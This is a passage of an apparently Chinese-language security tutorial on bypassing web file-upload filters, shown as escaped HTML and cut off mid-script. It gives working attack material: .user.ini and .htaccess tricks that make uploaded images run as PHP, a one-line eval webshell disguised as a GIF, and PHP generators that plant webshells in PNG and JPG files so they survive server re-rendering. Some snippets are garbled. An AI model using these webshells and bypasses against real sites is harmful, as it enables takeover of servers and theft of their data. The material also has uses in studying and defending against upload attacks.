\u6587\u4ef6\u4e2d\u53ea\u6709\u5177\u6709 PHP_INI_PERDIR \u548c PHP_INI_USER \u6a21\u5f0f\u7684 INI \u8bbe\u7f6e\u53ef\u88ab\u8bc6\u522b\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u5f88\u6e05\u695a\u4e86\uff0c<code>.user.ini<\/code>\u5b9e\u9645\u4e0a\u5c31\u662f\u4e00\u4e2a\u53ef\u4ee5\u7531\u7528\u6237\u201c\u81ea\u5b9a\u4e49\u201d\u7684php.ini\uff0c\u6211\u4eec\u80fd\u591f\u81ea\u5b9a\u4e49\u7684\u8bbe\u7f6e\u662f\u6a21\u5f0f\u4e3a\u201cPHP_INI_PERDIR \u3001 PHP_INI_USER\u201d\u7684\u8bbe\u7f6e\u3002\uff08\u4e0a\u9762\u8868\u683c\u4e2d\u6ca1\u6709\u63d0\u5230\u7684PHP_INI_PERDIR\u4e5f\u53ef\u4ee5\u5728.user.ini\u4e2d\u8bbe\u7f6e\uff09<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u9664\u4e86PHP_INI_SYSTEM\u4ee5\u5916\u7684\u6a21\u5f0f\uff08\u5305\u62ecPHP_INI_ALL\uff09\u90fd\u662f\u53ef\u4ee5\u901a\u8fc7.user.ini\u6765\u8bbe\u7f6e\u7684\u3002<\/p>\n\n\n\n<p>\u800c\u4e14\uff0c\u548cphp.ini\u4e0d\u540c\u7684\u662f\uff0c.user.ini\u662f\u4e00\u4e2a\u80fd\u88ab\u52a8\u6001\u52a0\u8f7d\u7684ini\u6587\u4ef6\u3002\u4e5f\u5c31\u662f\u8bf4\u6211\u4fee\u6539\u4e86.user.ini\u540e\uff0c\u4e0d\u9700\u8981\u91cd\u542f\u670d\u52a1\u5668\u4e2d\u95f4\u4ef6\uff0c\u53ea\u9700\u8981\u7b49\u5f85user_ini.cache_ttl\u6240\u8bbe\u7f6e\u7684\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a300\u79d2\uff09\uff0c\u5373\u53ef\u88ab\u91cd\u65b0\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p>\u7136\u540e\u6211\u4eec\u770b\u5230php.ini\u4e2d\u7684\u914d\u7f6e\u9879\uff0c\u53ef\u60dc\u6211\u6cae\u4e27\u5730\u53d1\u73b0\uff0c\u53ea\u8981\u7a0d\u5fae\u654f\u611f\u7684\u914d\u7f6e\u9879\uff0c\u90fd\u662fPHP_INI_SYSTEM\u6a21\u5f0f\u7684\uff08\u751a\u81f3\u662fphp.ini only\u7684\uff09\uff0c\u5305\u62ecdisable_functions\u3001extension_dir\u3001enable_dl\u7b49\u3002 \u4e0d\u8fc7\uff0c\u6211\u4eec\u53ef\u4ee5\u5f88\u5bb9\u6613\u5730\u501f\u52a9.user.ini\u6587\u4ef6\u6765\u6784\u9020\u4e00\u4e2a\u201c\u540e\u95e8\u201d\u3002 <code>auto_append_file<\/code>\u3001<code>auto_prepend_file<\/code><\/p>\n\n\n\n<p>\u6307\u5b9a\u4e00\u4e2a\u6587\u4ef6\uff0c\u81ea\u52a8\u5305\u542b\u5728\u8981\u6267\u884c\u7684\u6587\u4ef6\u524d\uff0c\u7c7b\u4f3c\u4e8e\u5728\u6587\u4ef6\u524d\u8c03\u7528\u4e86require()\u51fd\u6570\u3002\u800cauto_append_file\u7c7b\u4f3c\uff0c\u53ea\u662f\u5728\u6587\u4ef6\u540e\u9762\u5305\u542b\u3002 \u4f7f\u7528\u65b9\u6cd5\u5f88\u7b80\u5355\uff0c\u76f4\u63a5\u5199\u5728.user.ini\u4e2d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">auto_prepend_file=01.gif<\/pre>\n\n\n\n<p>01.gif\u662f\u8981\u5305\u542b\u7684\u6587\u4ef6\u3002<\/p>\n\n\n\n<p>\u52a0\u8f7d1.gif\u6587\u4ef6<\/p>\n\n\n\n<p>\u4e0a\u4f201.gif\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GIF89a<br>&lt;script language='php'&gt; @eval($_POST['a']);&lt;\/script&gt;<\/pre>\n\n\n\n<p>\u8bbf\u95ee\u540c\u76ee\u5f55\u4e2d\u7684php\u6587\u4ef6\uff0c\u4f8b\u5982index.php \uff0c\u5148\u901a\u8fc7\u672c\u76ee\u5f55\u4e2d\u7684\u914d\u7f6e\u6587\u4ef6.user.ini\u8fdb\u884c\u52a0\u8f7d1.gif\u6587\u4ef6\u4ece\u800c\u8fbe\u5230\u52a0\u8f7d\u540e\u95e8\u7684\u76ee\u7684<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u53ef\u4ee5\u501f\u52a9.user.ini\u8f7b\u677e\u8ba9\u6240\u6709php\u6587\u4ef6\u90fd\u201c\u81ea\u52a8\u201d\u5305\u542b\u67d0\u4e2a\u6587\u4ef6\uff0c\u800c\u8fd9\u4e2a\u6587\u4ef6\u53ef\u4ee5\u662f\u4e00\u4e2a\u6b63\u5e38php\u6587\u4ef6\uff0c\u4e5f\u53ef\u4ee5\u662f\u4e00\u4e2a\u5305\u542b\u4e00\u53e5\u8bdd\u7684webshell\u3002<\/p>\n\n\n\n<p><strong>.htaccess<\/strong><\/p>\n\n\n\n<p>.htaccess\u6587\u4ef6(\u6216\u8005\u201d\u5206\u5e03\u5f0f\u914d\u7f6e\u6587\u4ef6\u201d\uff09\u63d0\u4f9b\u4e86\u9488\u5bf9\u76ee\u5f55\u6539\u53d8\u914d\u7f6e\u7684\u65b9\u6cd5\uff0c \u5373\uff0c\u5728\u4e00\u4e2a\u7279\u5b9a\u7684\u6587\u6863\u76ee\u5f55\u4e2d\u653e\u7f6e\u4e00\u4e2a\u5305\u542b\u4e00\u4e2a\u6216\u591a\u4e2a\u6307\u4ee4\u7684\u6587\u4ef6\uff0c \u4ee5\u4f5c\u7528\u4e8e\u6b64\u76ee\u5f55\u53ca\u5176\u6240\u6709\u5b50\u76ee\u5f55\u3002\u4f5c\u4e3a\u7528\u6237\uff0c\u6240\u80fd\u4f7f\u7528\u7684\u547d\u4ee4\u53d7\u5230\u9650\u5236\u3002\u7ba1\u7406\u5458\u53ef\u4ee5\u901a\u8fc7Apache\u7684AllowOverride\u6307\u4ee4\u6765\u8bbe\u7f6e\u3002<\/p>\n\n\n\n<p>\u6982\u8ff0\u6765\u8bf4\uff0chtaccess\u6587\u4ef6\u662fApache\u670d\u52a1\u5668\u4e2d\u7684\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\uff0c\u5b83\u8d1f\u8d23\u76f8\u5173\u76ee\u5f55\u4e0b\u7684\u7f51\u9875\u914d\u7f6e\u3002\u901a\u8fc7htaccess\u6587\u4ef6\uff0c\u53ef\u4ee5\u5e2e\u6211\u4eec\u5b9e\u73b0\uff1a\u7f51\u9875301\u91cd\u5b9a\u5411\u3001\u81ea\u5b9a\u4e49404\u9519\u8bef\u9875\u9762\u3001\u6539\u53d8\u6587\u4ef6\u6269\u5c55\u540d\u3001\u5141\u8bb8\/\u963b\u6b62\u7279\u5b9a\u7684\u7528\u6237\u6216\u8005\u76ee\u5f55\u7684\u8bbf\u95ee\u3001\u7981\u6b62\u76ee\u5f55\u5217\u8868\u3001\u914d\u7f6e\u9ed8\u8ba4\u6587\u6863\u7b49\u529f\u80fd\u3002 \u542f\u7528.htaccess\uff0c\u9700\u8981\u4fee\u6539httpd.conf\uff0c\u542f\u7528AllowOverride\uff0c\u5e76\u53ef\u4ee5\u7528AllowOverride\u9650\u5236\u7279\u5b9a\u547d\u4ee4\u7684\u4f7f\u7528\u3002\u5982\u679c\u9700\u8981\u4f7f\u7528.htaccess\u4ee5\u5916\u7684\u5176\u4ed6\u6587\u4ef6\u540d\uff0c\u53ef\u4ee5\u7528AccessFileName\u6307\u4ee4\u6765\u6539\u53d8\u3002\u4f8b\u5982\uff0c\u9700\u8981\u4f7f\u7528.config \uff0c\u5219\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u914d\u7f6e\u6587\u4ef6\u4e2d\u6309\u4ee5\u4e0b\u65b9\u6cd5\u914d\u7f6e\uff1aAccessFileName .config \u3002 \u7b3c\u7edf\u5730\u8bf4\uff0c.htaccess\u53ef\u4ee5\u5e2e\u6211\u4eec\u5b9e\u73b0\u5305\u62ec\uff1a\u6587\u4ef6\u5939\u5bc6\u7801\u4fdd\u62a4\u3001\u7528\u6237\u81ea\u52a8\u91cd\u5b9a\u5411\u3001\u81ea\u5b9a\u4e49\u9519\u8bef\u9875\u9762\u3001\u6539\u53d8\u4f60\u7684\u6587\u4ef6\u6269\u5c55\u540d\u3001\u5c01\u7981\u7279\u5b9aIP\u5730\u5740\u7684\u7528\u6237\u3001\u53ea\u5141\u8bb8\u7279\u5b9aIP\u5730\u5740\u7684\u7528\u6237\u3001\u7981\u6b62\u76ee\u5f55\u5217\u8868\uff0c\u4ee5\u53ca\u4f7f\u7528\u5176\u4ed6\u6587\u4ef6\u4f5c\u4e3aindex\u6587\u4ef6\u7b49\u4e00\u4e9b\u529f\u80fd\u3002 .htaccess\u6587\u4ef6\u53ef\u4ee5\u5728\u7f51\u7ad9\u76ee\u5f55\u6811\u7684\u4efb\u4f55\u4e00\u4e2a\u76ee\u5f55\u4e2d\uff0c\u53ea\u5bf9\u8be5\u6587\u4ef6\u6240\u5728\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\u6709\u6548\u3002<\/p>\n\n\n\n<p>\u6ce8\u610f\uff1a<\/p>\n\n\n\n<p>1\u3001\u5b50\u76ee\u5f55\u4e2d\u7684\u6307\u4ee4\u4f1a\u7b3c\u76d6\u66f4\u9ad8\u7ea7\u76ee\u5f55\u6216\u8005\u4e3b\u5668\u914d\u7f6e\u4e2d\u7684\u6307\u4ee4\u3002 \u5982\u679c .htaccess \u6587\u4ef6\u4fdd\u5b58\u5728 \/apache\/home\/www\/Gunjit\/ \u76ee\u5f55\uff0c\u90a3\u4e48\u5b83\u4f1a\u5411\u8be5\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u5b50\u76ee\u5f55\u63d0\u4f9b\u547d\u4ee4\uff0c\u4f46\u5982\u679c\u8be5\u76ee\u5f55\u5305\u542b\u4e00\u4e2a\u540d\u4e3a \/Gunjit\/images\/ \u5b50\u76ee\u5f55\uff0c\u4e14\u8be5\u5b50\u76ee\u5f55\u4e2d\u4e5f\u6709\u4e00\u4e2a .htaccess \u6587\u4ef6\uff0c\u90a3\u4e48\u8fd9\u4e2a\u5b50\u76ee\u5f55\u4e2d\u7684\u547d\u4ee4\u4f1a\u8986\u76d6\u7236\u76ee\u5f55\u4e2d .htaccess \u6587\u4ef6(\u6216\u8005\u76ee\u5f55\u5c42\u6b21\u7ed3\u6784\u4e2d\u66f4\u4e0a\u5c42\u7684\u6587\u4ef6)\u63d0\u4f9b\u7684\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>.htaccess\u6587\u4ef6\u4e2d\u7684\u914d\u7f6e\u6307\u4ee4\u4f5c\u7528\u4e8e.htaccess\u6587\u4ef6\u6240\u5728\u7684\u76ee\u5f55\u53ca\u5176\u6240\u6709\u5b50\u76ee\u5f55\uff0c\u4f46\u662f\u5f88\u91cd\u8981\u7684\u3001\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5176\u4e0a\u7ea7\u76ee\u5f55\u4e5f\u53ef\u80fd\u4f1a\u6709.htaccess\u6587\u4ef6\uff0c\u800c\u6307\u4ee4\u662f\u6309\u67e5\u627e\u987a\u5e8f\u4f9d\u6b21\u751f\u6548\u7684\uff0c\u6240\u4ee5\u4e00\u4e2a\u7279\u5b9a\u76ee\u5f55\u4e0b\u7684.htaccess\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\u53ef\u80fd\u4f1a\u8986\u76d6\u5176\u4e0a\u7ea7\u76ee\u5f55\u4e2d\u7684.htaccess\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\uff0c\u5373\u5b50\u76ee\u5f55\u4e2d\u7684\u6307\u4ee4\u4f1a\u8986\u76d6\u7236\u76ee\u5f55\u6216\u8005\u4e3b\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4\u3002<\/p>\n\n\n\n<p>2\u3001.htaccess\u5fc5\u9700\u4ee5ASCII\u6a21\u5f0f\u4e0a\u4f20\uff0c\u6700\u597d\u5c06\u5176\u6743\u9650\u8bbe\u7f6e\u4e3a644\u3002 3\u3001\u4f7f\u7528.htaccess\u6587\u4ef6\uff0c\u4f1a\u964d\u4f4ehttpd\u670d\u52a1\u5668\u7684\u4e00\u70b9\u6027\u80fd<\/p>\n\n\n\n<p><strong>\u5982\u4f55\u542f\u7528.htaccess<\/strong> \u8981\u5728\u670d\u52a1\u5668\u4e0a\u4f7f\u7528.htaccess\u6587\u4ef6\u914d\u7f6e\uff0c\u5fc5\u987b\u8981\u6c42\u670d\u52a1\u5668\u5f00\u901a\u5bf9\u4e8e\u7684\u652f\u6301\u3002\u4e24\u4e2a\u6761\u4ef6\uff1a1.mod_rewrite\u6a21\u5757\u5f00\u542f\uff1b2. AllowOverride All, \u5982\u4f55\u914d\u7f6e\uff1a<\/p>\n\n\n\n<p>\u542f\u7528AllowOverride\u3002\u6253\u5f00httpd.conf, \u5c06\u5de5\u4f5c\u76ee\u5f55\u4e0b\u7684AllowOverride None \u6539\u4e3aAllowOverride All\u3002<\/p>\n\n\n\n<p>\u5f00\u542f.mod_rewrite\u6a21\u5757\u3002\u5c06#LoadModule rewrite_module modules\/mod_rewrite.so\u524d\u7684#\u53bb\u6389\u5373\u53ef\u3002<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u91cd\u542fapache<\/li>\n<\/ol>\n\n\n\n<p><strong>\u4f7f\u7528\u65b9\u6cd5<\/strong><\/p>\n\n\n\n<p>1\u4f7f\u7528\u65b9\u6cd5\uff0c\u4e0a\u4f20.htaccess\u6587\u4ef6\u5185\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;FilesMatch \"shell\"&gt;<br>SetHandler application\/x-httpd-php<br>&lt;\/FilesMatch&gt;<br>\u5339\u914d\u6587\u4ef6\u540d\u4e3a\u201cshell\u201d\u7684\u6587\u4ef6\uff0c\u8be5\u6587\u4ef6\u4f5c\u4e3a\u53ef\u6267\u884c\u7a0b\u5e8f\u89e3\u6790<\/pre>\n\n\n\n<p>\u6216\u8005<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">AddType application\/x-httpd-php .jpg<br>jpg\u6587\u4ef6\u4f5c\u4e3a\u53ef\u6267\u884c\u7a0b\u5e8f\u6267\u884c<\/pre>\n\n\n\n<p>2\u518d\u4e0a\u4f20shell.jpg<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GIF89a<br>&lt;script language='php'&gt; @eval($_POST['a']);&lt;\/script&gt;<\/pre>\n\n\n\n<p>3\u8bbf\u95eeshell.jpg\u6587\u4ef6<\/p>\n\n\n\n<p><strong>\u524d\u7aef\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p><strong>\u5220\u9664\u524d\u7aef\u6821\u9a8c\u6587\u4ef6<\/strong><\/p>\n\n\n\n<p>\u76f4\u63a5\u5220\u9664js\u4ee3\u7801<\/p>\n\n\n\n<p><strong>\u7981\u7528js\u4ee3\u7801<\/strong><\/p>\n\n\n\n<p>\u4f7f\u7528\u63d2\u4ef6<\/p>\n\n\n\n<p><strong>bp\u6293\u5305<\/strong><\/p>\n\n\n\n<p>\u4f7f\u7528bp\u6293\u5305\uff0c\u4fee\u6539\u4e3a\u6728\u9a6c\u540e\u7f00\u540d\u3002\u518dcontnet-type\u5c06\u4e0a\u4f20\u7684\u6587\u4ef6\u540e\u7f00\u8fdb\u884c\u4fee\u6539<\/p>\n\n\n\n<p><br><strong>\u4e8c\u6b21\u6e32\u67d3<\/strong><\/p>\n\n\n\n<p>\u539f\u7406\uff1a<\/p>\n\n\n\n<p>\u5728\u6211\u4eec\u4e0a\u4f20\u6587\u4ef6\u540e\uff0c\u7f51\u7ad9\u4f1a\u5bf9\u56fe\u7247\u8fdb\u884c\u4e8c\u6b21\u5904\u7406\uff0c\u670d\u52a1\u5668\u4f1a\u628a\u91cc\u9762\u7684\u5185\u5bb9\u8fdb\u884c\u66ff\u6362\u66f4\u65b0\uff0c\u6839\u636e\u539f\u6709\u7684\u56fe\u7247\u8fdb\u884c\u5bf9\u6bd4\uff0c\u627e\u5230\u6ca1\u4fee\u6539\u7684\u90e8\u5206\uff0c\u7136\u540e\u5229\u7528\u8fd9\u4e00\u90e8\u5206\uff0c\u751f\u6210\u4e00\u4e2a\u65b0\u7684\u56fe\u7247\u5e76\u653e\u5230\u7f51\u7ad9\u7684\u5bf9\u5e94\u6807\u7b7e\u8fdb\u884c\u663e\u793a\u3002<\/p>\n\n\n\n<p><strong>GIF\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\uff1a\u5236\u4f5c\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e00\uff1a\u76f4\u63a5\u7528Notepad++\u7b49\u8bb0\u4e8b\u672c\u7c7b\u578b\u8f6f\u4ef6\u6253\u5f00\uff0c\u5728\u56fe\u7247\u540e\u5199\u5165\u6267\u884c\u8bed\u53e5<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e8c\uff1a\uff08b\u4ee3\u8868\u7684\u662f\u4e8c\u8fdb\u5236\uff09\u4f7f\u7528\u547d\u4ee4\u5c06\u4e24\u4e2a\u6587\u4ef6\u5185\u5bb9\u5408\u5e76\uff08\u53ef\u4ee5\u5c06zip\u7b49\u5176\u4ed6\u7c7b\u578b\u6587\u4ef6\u4f2a\u88c5\u6210\u56fe\u7247\u7b49\uff0ccopy\/b 1.gif\/b+1.rar\/b 2.gif\uff09<\/p>\n\n\n\n<p>\u5c06\u51c6\u5907\u76841.gif \u548c2.php\u6587\u4ef6\uff0c\u6700\u540e\u518d\u548c\u6210\u4e3a3.gif<\/p>\n\n\n\n<p>\u5728\u76ee\u5f55\u4e0b\u6309\u4f4fshift\uff0c\u518d\u53f3\u952e\u6253\u5f00Open in Windows Terminal\uff08\u6216\u8005\u4ece\u547d\u4ee4\u63d0\u793a\u7b26\u8fdb\u5165\u5230\u8fd9\u4e2a\u76ee\u5f55\u4e2d\uff09<\/p>\n\n\n\n<p>copy 1.gif\/b + 2.php\/a 3.gif<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b65\uff1a\u5c06\u6587\u4ef6\u4e0a\u4f20\uff0c\u7136\u540e\u518d\u5bf9\u6bd4\u539f\u6587\u4ef6\u3002\u4e0a\u4f20\u540e\uff0c\u4f7f\u7528010\u8fdb\u5236\u7f16\u8f91\u5668\u81ea\u5e26\u7684\u6bd4\u8f83\u6587\u4ef6\uff0c\u70b9\u51fbtools\uff0c\u70b9\u51fbcompare Files\uff0c\u9009match\u90e8\u5206\uff0c\u537316\u8fdb\u5236\u84dd\u8272\u5b57\u6bb5\u5c31\u662f\u6ca1\u88ab\u6539\u53d8\u7684<\/p>\n\n\n\n<p>\u7b2c\u4e09\u6b65\uff1a\u53ef\u4ee5\u5728\u6ca1\u6709\u6539\u53d8\u7684\u5730\u65b9\u63d2\u5165\u800c\u5df2\u4ee3\u7801<\/p>\n\n\n\n<p>\u7b2c\u56db\u6b65\uff1a\u83b7\u53d6\u6d4f\u89c8\u5668\u6253\u5f00\u6587\u4ef6\u5730\u5740\uff0c\u8f6f\u4ef6\u8fde\u63a5<\/p>\n\n\n\n<p><strong>PNG\u7ed5\u8fc7<\/strong><\/p>\n\n\n\n<p>PNG\u6570\u636e\u7ec4\u6210\uff1a<\/p>\n\n\n\n<p>\u5173\u952e\u6570\u636e\u5757+\u8f85\u52a9\u6570\u636e\u5757<\/p>\n\n\n\n<p>\u6bcf\u4e2aPNG\u75313\u4e2a\u6807\u51c6\u6570\u636e\u5757\uff08IHDR,IDAT,IEND\uff09<\/p>\n\n\n\n<p>\u6807\u51c6\u6570\u636e\u5757\uff1a<\/p>\n\n\n\n<p>IHDR(header chunk):<\/p>\n\n\n\n<p>\u5305\u542b\u6709PNG\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u56fe\u50cf\u6570\u636e\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u5e76\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u6570\u636e\u5757\u51fa\u73b0\u5728PNG\u6570\u636e\u6d41\u4e2d\uff0c\u4e00\u4e2aPNG\u6570\u636e\u6d41\u4e2d\u53ea\u80fd\u6709\u4e00\u4e2a\u6587\u4ef6\u5934\u6570\u636e\u5757<\/p>\n\n\n\n<p>IDAT(image data chunk)\uff1a<\/p>\n\n\n\n<p>\u5b58\u50a8\u5b9e\u9645\u7684\u6570\u636e\uff0c\u5728\u6570\u636e\u6d41\u4e2d\u53ef\u5305\u542b\u591a\u4e2a\u8fde\u7eed\u987a\u5e8f\u7684\u56fe\u50cf\u6570\u636e\u5757\u3002 IDAT\u5b58\u653e\u7740\u56fe\u50cf\u771f\u6b63\u7684\u6570\u636e\u4fe1\u606f\uff0c\u4e86\u89e3IDAT\u7684\u7ed3\u6784\uff0c\u5c31\u53ef\u4ee5\u751f\u6210PNG\u56fe\u50cf<\/p>\n\n\n\n<p>IEND(image trailer chunk)<\/p>\n\n\n\n<p>\u6807\u8bb0PNG\u6587\u4ef6\u6216\u8005\u6570\u636e\u6d41\u5df2\u7ecf\u7ed3\u675f\uff0c\u5e76\u4e14\u5fc5\u987b\u653e\u5728\u6587\u4ef6\u7684\u5c3e\u90e8\uff0c\u5373<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">00 00 00 00 49 45 4E 44 AE 42 60 82<\/pre>\n\n\n\n<p>\u8f85\u52a9\u6570\u636e\u5757\uff1a<\/p>\n\n\n\n<p>PLTE\uff1a<\/p>\n\n\n\n<p>\u662f\u8f85\u52a9\u6570\u636e\u5757,\u5bf9\u4e8e\u7d22\u5f15\u56fe\u50cf\uff0c\u8c03\u8272\u677f\u4fe1\u606f\u662f\u5fc5\u987b\u7684\uff0c\u8c03\u8272\u677f\u7684\u989c\u8272\u7d22\u5f15\u4ece0\u5f00\u59cb\u7f16\u53f7\uff0c\u7136\u540e\u662f1\u30012\u2026\u2026\uff0c\u8c03\u8272\u677f\u7684\u989c\u8272\u6570\u4e0d\u80fd\u8d85\u8fc7\u8272\u6df1\u4e2d\u89c4\u5b9a\u7684\u989c\u8272\u6570\uff08\u5982\u56fe\u50cf\u8272\u6df1\u4e3a4\u7684\u65f6\u5019\uff0c\u8c03\u8272\u677f\u4e2d\u7684\u989c\u8272\u6570\u4e0d\u53ef\u4ee5\u8d85\u8fc72^4=16\uff09\uff0c\u5426\u5219\uff0c\u8fd9\u5c06\u5bfc\u81f4PNG\u56fe\u50cf\u4e0d\u5408\u6cd5\u3002<\/p>\n\n\n\n<p>\u5229\u7528\u8fc7\u7a0b\uff1a\u4f7f\u7528PHP\u811a\u672c\u5199\u5165\u5728IDTA\u4e2d<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\uff1a\u521b\u5efaIDAT_png.php\u811a\u672c\uff08\u751f\u6210\u4e00\u4e2a\u7ed5\u8fc7\u6e32\u67d3\u7684\u56fe\u7247\u9a6c\uff09\uff1a<\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u5373\u53ef\u751f\u6210<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?$_GET[0]($_POST[1];?)&gt;<\/pre>\n\n\n\n<p>\u4f7f\u7528\u65b9\u5f0f\uff1aget\u4f20\u53c20= post\u4f20\u53c21=<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0x66, 0x44, 0x50, 0x33);<br> <br> <br> <br>$img = imagecreatetruecolor(32, 32);<br> <br>for ($y = 0; $y &lt; sizeof($p); $y += 3) {<br> &nbsp; $r = $p[$y];<br> &nbsp; $g = $p[$y+1];<br> &nbsp; $b = $p[$y+2];<br> &nbsp; $color = imagecolorallocate($img, $r, $g, $b);<br> &nbsp; imagesetpixel($img, round($y \/ 3), 0, $color);<br>}<br> <br>imagepng($img,'.\/1.png');<br>?&gt;<\/pre>\n\n\n\n<p>\u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528php\u547d\u4ee4\u6267\u884cphp\u811a\u672c\u6587\u4ef6<\/p>\n\n\n\n<p>\u6267\u884c\u547d\u4ee4\uff08\u6ca1\u62a5\u9519\u5c31\u662f\u6210\u529f\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php IDAT_png.php 2.png<\/pre>\n\n\n\n<p>\u7136\u540e\u53ef\u4ee5\u770b\u5230\u751f\u6210\u4e86\u4e00\u4e2aphp\u811a\u672c\u91cc\u9762\u8fd0\u884c\u51fa\u6765\u76841.png\u6587\u4ef6<\/p>\n\n\n\n<p>\u4e0a\u4f20\u751f\u6210\u76841.png\u6587\u4ef6\uff0c\u5728\u6d4f\u89c8\u5668\u4e0a\u8bbf\u95ee<\/p>\n\n\n\n<p>\u80fd\u6b63\u5e38\u8bbf\u95ee<\/p>\n\n\n\n<p>\u7528\u7684php\u811a\u672c\u751f\u6210\u7684\u56fe\u7247\u6240\u5199\u5165\u7684\u662f&lt;?$_GET[0]($_POST[1]);?&gt;<\/p>\n\n\n\n<p>\uff08\u6839\u636e\u811a\u672c\u5199\u5165\u60c5\u51b5\u6765\u5b9a\uff0c\u4e0d\u786e\u5b9a\u53ef\u4ee5\u7528010 Editor\u7b49\u7f16\u8f91\u5668\u67e5\u770b\uff09<\/p>\n\n\n\n<p>\u7136\u540e\u7ed3\u5408\u6587\u4ef6\u4e0a\u4f20\uff0c\u8fdb\u884cGET\u548cPOST\u4f20\u53c2<\/p>\n\n\n\n<p>get\u4f20\u53c20=<\/p>\n\n\n\n<p>post\u4f20\u53c21=<\/p>\n\n\n\n<p>\uff08\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u628a\u4e0a\u4f20\u7684\u56fe\u7247\u518d\u4fdd\u5b58\u5230\u672c\u5730\uff0c\u7528010 Editor\u67e5\u770b\uff09 \u7136\u540e\u8681\u5251\u8fde\u63a5<\/p>\n\n\n\n<p>JPG\u7ed5\u8fc7<\/p>\n\n\n\n<p>JPG\u662fJPEG\u7684\u7b80\u5199\uff0cjpg\u662f\u540e\u7f00\u540d\uff0cjpeg\u65e2\u53ef\u4ee5\u4f5c\u4e3a\u540e\u7f00\u540d\u53c8\u80fd\u4ee3\u8868\u6587\u4ef6\u683c\u5f0f\u548cpng\u7684\u64cd\u4f5c\u6b65\u9aa4\u57fa\u672c\u4e00\u81f4\uff0c\u5c31\u662f\u811a\u672c\u4e0d\u4e00\u6837\u3002<\/p>\n\n\n\n<p>\u5728\u548cJPG\u540c\u4e00\u6587\u4ef6\u4e0b\u521b\u5efajpg_payload.php\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br> <br> &nbsp;  $miniPayload = \"&lt;?=phpinfo();?&gt;\";<br> <br> <br> &nbsp;  if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {<br> &nbsp; &nbsp; &nbsp;  die('php-gd is not installed');<br> &nbsp;  }<br> <br> &nbsp;  if(!isset($argv[1])) {<br> &nbsp; &nbsp; &nbsp;  die('php jpg_payload.php &lt;jpg_name.jpg&gt;');<br> &nbsp;  }<br> <br> &nbsp;  set_error_handler(\"custom_error_handler\");<br> <br> &nbsp;  for($pad = 0; $pad &lt; 1024; $pad++) {<br> &nbsp; &nbsp; &nbsp;  $nullbytePayloadSize = $pad;<br> &nbsp; &nbsp; &nbsp;  $dis = new DataInputStream($argv[1]);<br> &nbsp; &nbsp; &nbsp;  $outStream = file_get_contents($argv[1]);<br> &nbsp; &nbsp; &nbsp;  $extraBytes = 0;<br> &nbsp; &nbsp; &nbsp;  $correctImage = TRUE;<br> <br> &nbsp; &nbsp; &nbsp;  if($dis-&gt;readShort() != 0xFFD8) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('Incorrect SOI marker');<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  while((!$dis-&gt;eof()) &amp;&amp; ($dis-&gt;readByte() == 0xFF)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $marker = $dis-&gt;readByte();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $size = $dis-&gt;readShort() - 2;<br> 